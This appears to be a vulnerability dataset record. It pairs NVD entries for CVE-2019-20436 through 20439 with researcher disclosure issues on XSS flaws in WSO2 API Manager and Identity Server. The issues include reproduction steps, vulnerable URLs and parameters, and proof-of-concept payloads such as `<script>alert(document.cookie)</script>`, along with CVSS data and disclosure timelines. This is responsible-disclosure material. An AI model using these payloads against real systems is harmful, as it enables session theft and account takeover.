![4](https://user-images.githubusercontent.com/13975575/69720847-8f1be700-1139-11ea-8c6f-e1cf844e2e3e.png) Figure 04: <a href="https://192.168.107.2:9443/publisher/site/pages/inline-editor.jag?docName=XSS%3Cimg%20src=x%20onerror=prompt(1)%3E&apiName=test&version=2.0&provider=admin&mode=edit&tenant=carbon.super">Crafted request</a> with XSS payload, `XSS<img src=x onerror=prompt(1)>` gets reflected in the same browser as response. --- <strong>Reproducing Steps</strong> 1. Login to the application <strong>(admin/admin)</strong> through the login <a href="https://192.168.107.2:9443/publisher/site/pages/login.jag">URL.</a> 2. Go to API <a href="https://192.168.107.2:9443/publisher/info?name=test&version=2.0&provider=admin">‘Docs’</a> section in the created API. 3. <a href="https://192.168.107.2:9443/publisher/site/blocks/documentation/ajax/docs.jag">‘Add New document’</a> details and submit it. 4. Go to <a href="https://192.168.107.2:9443/publisher/site/pages/inline-editor.jag?docName=XSS&apiName=test&version=2.0&provider=admin&mode=edit&tenant=carbon.super">‘Edit Content’</a> available to edit the document details. 5. Modify the <a href="https://192.168.107.2:9443/publisher/site/pages/inline-editor.jag?docName=XSS&apiName=test&version=2.0&provider=admin&mode=edit&tenant=carbon.super">URL</a> variable, `docName` with a XSS payload, `XSS<img src=x onerror=prompt(1)>` 6. Now, click on the <a href="https://192.168.107.2:9443/publisher/site/pages/inline-editor.jag?docName=XSS%3Cimg%20src=x%20onerror=prompt(1)%3E&apiName=test&version=2.0&provider=admin&mode=edit&tenant=carbon.super">crafted URL</a> to execute the injected XSS payload every time. --- <strong>Timeline</strong> 2019-06-21 – Discovered in WSO2 API Manager Product version 2.6.0 2019-06-21 – Reported to security@wso2.com 2019-06-21 – Got instant response from WSO2 security team, "Thanks for reporting the issue. We'll look into this and get back to you. Appreciate your continued support." 2019-07-12 - Customer Announcement - End of July, Public Announcement: End of August. 2019-08-13 - Customer Announcement is done. Public Announcement is scheduled. 2019-09-10 - Customer Announcement is done. Public Announcement is scheduled at the end of September. [postponed to September due to internal reasons] 2019-10-08 - Got mail saying, "We have scheduled a public announcement for the issue by the end of this week" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Reflected Cross Site Scripting (XSS) in WSO2 Product (WSO2 API Manager version 2.6.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/18/comments
0
2019-11-27T12:00:44Z
2019-11-29T10:45:12Z
https://github.com/cybersecurityworks/Disclosed/issues/18
529,302,954
18
1,039
CVE-2019-20436
2020-01-28T01:15:11.957
An issue was discovered in WSO2 API Manager 2.6.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. If there is a claim dialect configured with an XSS payload in the dialect URI, and a user picks up this dialect's URI and adds it as the service provider claim dialect while configuring the service provider, that payload gets executed. The attacker also needs to have privileges to log in to the management console, and to add and configure claim dialects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20436-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20436-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "60781FE4-38A3-4FEA-9D8B-CADE4B535974", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B169832-A746-49A6-8E92-06624AA9B13A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://wso2.com/identity-and-access-management/#">WSO2 Identity Server</a> Version: <a href="https://docs.wso2.com/display/IS570/About+this+Release">5.7.0</a> Homepage: https://wso2.com/ Severity: Medium Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> Vulnerable URL: https://localhost:9443/carbon/identity-claim-mgt/add-dialect-finish-ajaxprocessor.jsp Vulnerable Variable: <strong>dialect</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager [2] WSO2 API Manager Analytics [3] WSO2 IS as Key Manager [4] WSO2 Identity Server [5] WSO2 Identity Server Analytics # Description: Cross Site Scripting (XSS) vulnerability in WSO2 Identity Server. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) POST request `dialect` variable is vulnerable to stored cross site scripting (XSS) in the URL, https://localhost:9443/carbon/identity-claim-mgt/add-dialect-finish-ajaxprocessor.jsp ![1](https://user-images.githubusercontent.com/13975575/69864413-de425300-12c4-11ea-8fc7-785dc40b49fc.png) Figure 01: Adding XSS payload to `dialect` variable ![2](https://user-images.githubusercontent.com/13975575/69864407-dda9bc80-12c4-11ea-9ffe-d10995216209.png) Figure 02: Added XSS payload, `<script>alert(document.cookie)</script>` gets stored ![3](https://user-images.githubusercontent.com/13975575/69864408-dda9bc80-12c4-11ea-9332-f56537868818.png) Figure 03: Edit the service provider information ![4](https://user-images.githubusercontent.com/13975575/69864409-de425300-12c4-11ea-805f-6cd1f98cf17b.png) Figure 04: Select the XSS payload stored in the claims ![5](https://user-images.githubusercontent.com/13975575/69864410-de425300-12c4-11ea-8178-74920835e883.png) Figure 05: Add Service Provider Claim Dialect URI by selecting the stored URI value from claims ![6](https://user-images.githubusercontent.com/13975575/69864411-de425300-12c4-11ea-996b-87806c600268.png) Figure 06: Injected XSS payload gets executed in the browser after adding claims. --- <strong>Reproducing Steps</strong> 1. Login to the Application. 2. Go to <a href="https:/localhost:9443/carbon/identity-claim-mgt/add-dialect.jsp">URL. </a> 3. <a href="https://192.168.0.137:9443/carbon/identity-claim-mgt/add-dialect.jsp">Add</a> Dialect URI Value to the POST Request <a href="https://localhost:9443/carbon/identity-claim-mgt/add-dialect-finish-ajaxprocessor.jsp">URL,</a> in the `dialect` variable. 4. Now, Go to <a href="https://localhost:9443/carbon/application/list-service-providers.jsp?region=region1&item=list_service_providers_menu">Service Provider section.</a> 5. Create new service provider information or <a href="https:/localhost:9443/carbon/application/configure-service-provider.jsp?spName=XSS">edit</a> an existing Service Provider information (Here its `XSS`) 6. Select Service Provider Claim Dialect in the given list of details and click on "Add" button to see the injected XSS payload gets executed in the browser. --- <strong>Timeline</strong> 2019-06-25 – Discovered in WSO2 Identity Server 5.7.0 Version 2019-06-25 – Reported to security@wso2.com 2019-06-25 – Got instant response from WSO2 security team, "Thanks for the latest analysis on WSO2 Identity Server. We'll do the review on this and get back to you soon." 2019-07-12 - Got mail from WSO2 team saying, "Currently, issues reported in Identity Server are under the analyzing state." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement Done. Public Announcement is scheduled at the end of September 2019-10-08 - Got mail saying, "We have scheduled a public announcement for the issue by the end of this week" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in WSO2 Product (WSO2 Identity Server version 5.7.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/19/comments
0
2019-11-29T10:51:10Z
2020-01-20T11:01:12Z
https://github.com/cybersecurityworks/Disclosed/issues/19
530,281,451
19
1,040
CVE-2019-20437
2020-01-28T01:15:12.037
An issue was discovered in WSO2 API Manager 2.6.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. When a custom claim dialect with an XSS payload is configured in the identity provider basic claim configuration, that payload gets executed, if a user picks up that dialect's URI as the provisioning claim in the advanced claim configuration of the same Identity Provider. The attacker also needs to have privileges to log in to the management console, and to add and update identity provider configurations.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20437-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20437-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "60781FE4-38A3-4FEA-9D8B-CADE4B535974", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B169832-A746-49A6-8E92-06624AA9B13A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/20
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://wso2.com/identity-and-access-management/#">WSO2 Identity Server</a> Version: <a href="https://docs.wso2.com/display/IS570/About+this+Release">5.7.0</a> Homepage: https://wso2.com/ Severity: Medium Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager [2] WSO2 IS as Key Manager [3] WSO2 Identity Server # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) ![1](https://user-images.githubusercontent.com/13975575/69866053-06cc4c00-12c9-11ea-8cba-27db61e976d3.png) Figure 01: Adding Identity providers information ![2](https://user-images.githubusercontent.com/13975575/69866054-06cc4c00-12c9-11ea-8862-6ba6c5985bc8.png) Figure 02: Added XSS payload, `XSS”><script>alert(document.cookie)</script>` in Basic Claim Configuration gets stored ![3](https://user-images.githubusercontent.com/13975575/69866049-0633b580-12c9-11ea-8619-b4bd63300a46.png) Figure 03: Above added `Custom Claim Dialect` value gets stored and added to select drop down box of “Advanced Claim Configuration” ![4](https://user-images.githubusercontent.com/13975575/69866051-0633b580-12c9-11ea-8661-57facc0f5ce2.png) Figure 04: Clicking on `Add Claim` executes the stored XSS Payload ![5](https://user-images.githubusercontent.com/13975575/69866052-06cc4c00-12c9-11ea-9019-95dd3d08fb45.png) Figure 05: Clicking on `Add claim` button will keep adding the XSS Payload to the page. --- <strong>Reproducing Steps</strong> 1. Login to the Application 2. Go to <a href="https://192.168.0.137:9444/carbon/idpmgt/idp-mgt-edit.jsp?region=region1&item=identity_providers_add">URL.</a> 3. Adding identity provider information 4. Click on Claim Configuration 5. Navigate through `Basic Claim Configuration` 6. Choose `Define Custom Claim Dialect` and `Add Claim Mapping` with XSS Payload (like, `XSS"><script>alert(document.cookie)</script>`) 7. Then, Navigate to `Advanced Claim Configuration` 8. Select `Claim URI` from `Provisioning Claim Filter` section. 9. Clicking on `Add claim` button reflects the stored XSS payload in the browser. 10. Similarly, the stored XSS payload gets reflected in the browser every time when the user clicks on “Add claim” button. --- <strong>Timeline</strong> 2019-06-29 – Discovered in WSO2 Identity Server v5.7.0. 2019-06-29 – Reported to security@wso2.com 2019-06-29 – Got instant response from WSO2 security team, "Thanks for your analysis report. I will forward this to respective product team and they will get back to you with the feedback ASAP." 2019-07-01 – Got response from WSO2 security team, "Thank you for reporting this issue. We were able to reproduce it, and now further analyzing on solving this. We will keep you posted." 2019-07-12 - Got mail from WSO2 team saying, "Currently, issues reported in Identity Server are under the analyzing state." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement is done. Public Announcement is scheduled at the end of September. 2019-10-08 - Got mail saying, "We have scheduled a public announcement for the issue by the end of this week" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in "malicious dialect URI" on WSO2 Product - (WSO2 Identity Server version 5.7.0)
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/20/comments
0
2019-11-29T11:09:28Z
2019-11-29T12:08:12Z
https://github.com/cybersecurityworks/Disclosed/issues/20
530,289,708
20
1,041
CVE-2019-20438
2020-01-28T01:15:12.113
An issue was discovered in WSO2 API Manager 2.6.0. A potential stored Cross-Site Scripting (XSS) vulnerability has been identified in the inline API documentation editor page of the API Publisher.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20438-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20438-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/22
[ "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">WSO2 API Manager</a> Version: <a href="https://docs.wso2.com/display/AM260/About+this+Release">2.6.0</a> Homepage: https://wso2.com/ Severity: Medium Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version 2.6.0 Product. Issue 01: Stored cross site scripting: ![1](https://user-images.githubusercontent.com/13975575/72612785-bd58be80-3953-11ea-95b1-37319a02dba5.png) Figure 01: Choose “Edit Content” after creating a document ![Picture2](https://user-images.githubusercontent.com/13975575/72612786-bd58be80-3953-11ea-9303-f427b109aa3f.png) Figure 02: Clicked on </> to add XSS payload ![Picture3](https://user-images.githubusercontent.com/13975575/72612782-bcc02800-3953-11ea-996e-2f0efd4d7cd8.png) Figure 03: Use “Save” button to Save the document with added “XSS Payload” ![Picture4](https://user-images.githubusercontent.com/13975575/72612783-bcc02800-3953-11ea-86eb-51ddc068320a.png) Figure 04: Saving and clicking on </> back stores the XSS payload and executes in the browser ![Picture5](https://user-images.githubusercontent.com/13975575/72612784-bcc02800-3953-11ea-82b8-be2a755e73e7.png) Figure 05: The stored XSS payload gets executed whenever the user loads the <a href="https://192.168.0.138:9443/publisher/site/pages/inline-editor.jag?docName=xss&apiName=test&version=test&provider=admin&mode=edit&tenant=carbon.super">page,</a> --- <strong>Reproducing Steps</strong> 1. Login to the Application. 2. Create an API and navigate to doc tag to <a href="https://192.168.0.138:9443/publisher/site/blocks/documentation/ajax/docs.jag">“Add new document”</a> 3. Click on <a href="https://192.168.0.138:9443/publisher/info?name=test&version=test&provider=admin">“Edit content”</a> after creating a valid document. 4. Edit the document content value in “content” variable with XSS payload, “<script>alert(document.cookie)</script>” 5. Now, Whenever the user loads the <a href="https://192.168.0.138:9443/publisher/site/pages/inline-editor.jag?docName=xss&apiName=test&version=test&provider=admin&mode=edit&tenant=carbon.super">page </a> the stored XSS payload gets executed in the browser. --- <strong>Timeline</strong> 2019-07-05 – Discovered in <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">`WSO2 API Manager v2.6.0`</a> 2019-07-06 – Reported to <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-23 - Closed the issue in <a href="https://www.intigriti.com/">intigriti</a> platform saying it as "out of scope" 2019-07-26 – Discovered in WSO2 API Manager version 2.6.0. 2019-07-26 – Reported to security@wso2.com 2019-07-26 – Got instant response from WSO2 security team, "Thanks for your continuous effort on analyzing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback." 2019-08-05 – Got mail from WSO2 team saying, "We were able to reproduce the issue with APIM 2.6.0. We will fix this and provide you with an update." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement is scheduled 2019-10-08 - Got mail saying, "Customer Security Announcement for the issues are scheduled by the end of September" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635, </a>and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">WSO2-2019-0644</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in 'inline API documentation editor page' | WSO2 API Manager version 2.6.0 | WSO2 Product
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/22/comments
0
2020-01-17T12:35:46Z
2020-01-17T12:35:46Z
https://github.com/cybersecurityworks/Disclosed/issues/22
551,391,114
22
1,042
CVE-2019-20439
2020-01-28T01:15:12.190
An issue was discovered in WSO2 API Manager 2.6.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in defining a scope in the "manage the API" page of the API Publisher.
